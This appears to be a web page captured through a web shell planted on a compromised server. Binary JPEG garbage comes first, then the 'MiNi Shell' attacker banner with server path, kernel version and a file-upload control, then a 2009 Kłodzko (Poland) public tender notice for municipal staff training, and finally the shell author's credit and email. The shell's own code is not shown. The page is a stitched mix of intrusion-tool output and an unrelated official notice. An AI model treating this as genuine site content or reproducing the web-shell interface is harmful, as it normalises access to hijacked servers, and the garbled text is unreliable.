JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090327/55809-N-2009.html

<p class="kh_header"><b>Kłodzko: PRZEPROWADZENIE SZKOLEŃ SPECJALISTYCZNYCH DOTYCZĄCYCH WZMOCNIENIA ZDOLNOŚCI JST W ZAKRESIE TWORZENIA AKTÓW PRAWA MIEJSCOWEGO I WYDAWANIA DECYZJI ADMINISTRACYJNYCH
W RAMACH PROJEKTU PN. EUROPEJSKI URZĘDNIK- PODNIESIENIE POZIOMU WIEDZY I UMIEJĘTNOŚCI KADRY URZĘDNICZEJ KŁODZIEGO MAGISTRATU</b><br>
<b>Numer ogłoszenia: 55809 - 2009; data zamieszczenia: 27.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kłodzko , pl. Bolesława Chrobrego 1, 57-300 Kłodzko, woj. dolnośląskie, tel. 074/8654600, faks 074 8674062.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.klodzko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEPROWADZENIE SZKOLEŃ SPECJALISTYCZNYCH DOTYCZĄCYCH WZMOCNIENIA ZDOLNOŚCI JST W ZAKRESIE TWORZENIA AKTÓW PRAWA MIEJSCOWEGO I WYDAWANIA DECYZJI ADMINISTRACYJNYCH
W RAMACH PROJEKTU PN. EUROPEJSKI URZĘDNIK- PODNIESIENIE POZIOMU WIEDZY I UMIEJĘTNOŚCI KADRY URZĘDNICZEJ KŁODZIEGO MAGISTRATU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia  (CPV-80500000-9 )- usługi szkoleniowe
Przedmiotem postępowania jest usługa organizacji szkoleń specjalistycznych dla pracowników samorządu terytorialnego o następującej tematyce:
1.	Doskonalenie umiejętności administracyjnych- szkolenie adresowane do kadry urzędu, mające na celu określenie cech i umiejętności niezbędnych przy zajmowaniu stanowiska  podejmowania i stanowienia decyzji administracyjnych. Program zajęć powinien również zawierać informacje dotyczące autoprezentacji, zasad prezentowania                                         i komunikowania się,
2.	Akty prawne w oświacie - szkolenie adresowane do pracowników  wydziałów oświaty           o tematyce rodzajów, sposobu ogłaszania aktów prawnych, budowie Dziennika Urzędowego, 
3.	Budowanie relacji i zasad odpowiedzialności w procesie administracyjnym- szkolenie adresowane do osób, które w zakresie swoich obowiązków mają sporządzanie, wydawanie aktów administracyjnych oraz dla ich przełożonych.  , 
4.	Postępowanie administracyjne-praktyczne zastosowanie przepisów KPA- tematyka szkolenia obejmuje : pojęcie postępowania administracyjnego, kodeks dobrej administracji, zakres obowiązywania kpa, zasady ogólne kpa. ,
5.	Prawo budżetowe w JST- tematyka szkolenia  dotyczyć będzie zagadnień prawa: administracyjnego, przetargowego, pracy oraz finansów publicznych ( z głównym naciskiem na tworzenie i uchwalanie budżetu gminy) i polityki finansowej,
6.	Zarządzanie procesami inwestycyjnymi- szkolenia skierowane do pracowników biorących udział w procesie inwestycyjnym gminy dotyczące  prawnego i administracyjnego zarządzania inwestycjami (definiowanie projektu, drzewo problemów, etapy procesu inwestycyjnego, przepisy prawa w procesie inwestycyjnym, plan zagospodarowania przestrzennego).,
7.	FIDIC oraz Prawo budowlane- szkolenie dla osób zajmujących się realizacją inwestycji na terenie gminy. Szkolenie powinno obejmować szczegółowe omówienie zagadnień związanych z procedurami FIDIC, podstawy prawne, ubezpieczenia w budownictwie, zapewnienie jakości i pozostałe tematy związane z prawem budowlanym; szkolenie dla osób zajmujących się realizacją inwestycji na terenie gminy, 
8.	Prawidłowe redagowanie Uchwał w JST- szkolenie i warsztaty przeznaczone dla wszystkich pracowników opracowujących uchwały, tematyka: budowa uchwały, zasady komponowania treści i wprowadzania w życie, podstawy prawne uchwały ,
9.	Nowelizacja podstaw prawnych- szkolenie przeznaczone dla pracowników administracji wydających akty prawne , przedstawienie zmiana prawa;

Szkolenia będą odbywać się w godzinach pracy Urzędu Miejskiego w Kłodzku .
Szczegółowy zakres rzeczowy zlecenia:
1). Poniższa tabela przedstawia ilość godzin poszczególnych szkoleń i osób w grupie	
Lp.	Temat szkolenia	Ilość grup	Ilość godzin szkolenia	Ilość cykli szkoleniowych 	godziny szkolenia
razem	Ilość kompletów materiałów szkoleniowych 
ROK 2009
1.	Doskonalenie umiejętności administracyjnych	2	16	3	96	66
2.	Akty prawne w oświacie	1	12	3	36	36
3.	Budowanie relacji i zasad odpowiedzialności w procesie administracyjnym	2	16	3	96	60
4.	Postępowanie administracyjne - praktyczne zastosowanie przepisów KPA	2	16	3	96	57
5.	Prawo budżetowe w jst	1	12	3	36	60
6.	Zarządzanie procesami inwestycyjnymi	1	24	3	72	30
7.	FIDIC oraz prawo budowlane	1	12	3	36	39
8.	Prawidłowe redagowanie uchwał	5	8	3	120	150
9.	Nowelizacja podstaw prawnych	2	24	3	144	72
ROK 2010
1.	Doskonalenie umiejętności administracyjnych	2	11	1	22	22
2.	Akty prawne w oświacie	1	12	1	12	12
3.	Budowanie relacji i zasad odpowiedzialności w procesie administracyjnym	2	10	1	20	20
4.	Postępowanie administracyjne - praktyczne zastosowanie przepisów KPA	2	9	1	18	19
5.	Prawo budżetowe w jst	1	20	1	20	20
6.	Zarządzanie procesami inwestycyjnymi	1	10	1	10	10
7.	FIDIC oraz prawo budowlane	1	13	1	13	13
8.	Prawidłowe redagowanie uchwał	5	10	1	50	50
9.	Nowelizacja podstaw prawnych	2	12	1	24	24
W przypadku kilku cykli szkoleniowych przedstawiane będą informacje zawarte w programie szkolenia specjalistycznego tzn., iż w kolejnych cyklach przedstawienie zostaną nowe informacje nie ujęte w poprzednim cyklu stanowiące ich kontynuację.
2). Przygotowanie przez Wykonawcę   list obecności uczestników szkoleń,
3). Przygotowanie przez Wykonawcę  i druk materiałów szkoleniowych  dla wszystkich uczestników szkoleń z  zapewnieniem promocji projektu i PO Kapitał Ludzki, komplet materiałów  powinien zawierać opis szkolenia, prezentacje i streszczenie  wykładów  wykonanych przez wykładowców, notatnik, długopis,
4). Zapewnienie  ekspertów - wykładowców prowadzących szkolenia - min. 5 osób prowadzących;
5). Przygotowanie i przeprowadzenie testów weryfikujących zdobytą wiedzę (test na rozpoczęcie i na zakończenie) oraz ankiety anonimowej zawierającej ocenę szkolenia z uwzględnieniem następujących elementów: ocena przydatności szkolenia dla uczestnika, ocena poszczególnych wykładowców, ocena programu szkolenia,
6). Miejsce realizacji szkolenia: Urząd Miejski w Kłodzku,
7). Zamawiający zapewnia sprzęt multimedialny do prowadzenia szkoleń..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> wadium nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia ubiegać się mogą Wykonawcy składający ważną i odpowiednią ofertę oraz:
1.1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
1.2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami  zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia
1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 PZP.
2. Zapewnienie  ekspertów - wykładowców prowadzących szkolenia - min. 5 osób prowadzących.
3 . Minimum 1 usługa szkoleniowa w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie, odpowiadająca swoim rodzajem usługom stanowiącym przedmiot zamówienia oraz załączenia dokumentów potwierdzających, że ta usługa została należycie wykonana, np. referencje. 
Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu.
1.	Komisja przetargowa, powołana przez zamawiającego, dokona oceny spełnienia warunków udziału w postępowaniu, na podstawie dokumentów i oświadczeń złożonych  w ofercie, potwierdzających spełnienie wymaganych warunków wg zasady spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wypełniony i podpisany formularz oferty, (załącznik nr 1).
2.	Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych  (załącznik nr 2).
3.	Dokumenty zgodne z art. 26 ust. 2 PZP i wyszczególnione w § 1 ust. 1 pkt. 2, ust 2 pkt 2, 5  Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane  (Dz. U. Nr 87, poz. 605 ze zm):
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składaniu ofert.
b). Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, sporządzony zgodnie ze wzorem przedstawionym w siwz, zał nr 3.
c). Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom lub usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te dostawy lub usługi zostały należycie wykonane- np. referencje, sporządzony zgodnie ze wzorem przedstawionym w siwz zał nr 4.
4.	Dokumenty dodatkowe: 
a)	 Pełny program szkoleń przedstawiony przez Wykonawcę,
b)	 Preliminarz kosztów szkolenia (załącznik nr 2 do umowy z Wykonawcą)
c)	Parafowany przez osobę upoważnioną projekt umowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - Program szkoleń - merytoryka - 15</li>
<li>3 - Doświadczenie i dotychczasowy dorobek wykonawcy w zakresie zbliżonym do przedmiotu zamówienia publicznego oraz kompet. prowadzących szkolenia zaw w cv - 15</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.um.klodzko.pl /zamówienia publiczne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kłodzka pl. Bolesława Chrobrego1 57-300 Kłodzko pok. 226..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2009 godzina 10:00, miejsce: Urząd Miasta Kłodzka pl. Bolesława Chrobrego1 57-300 Kłodzko pok. 101 - Biuro Obsługi Ludności..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com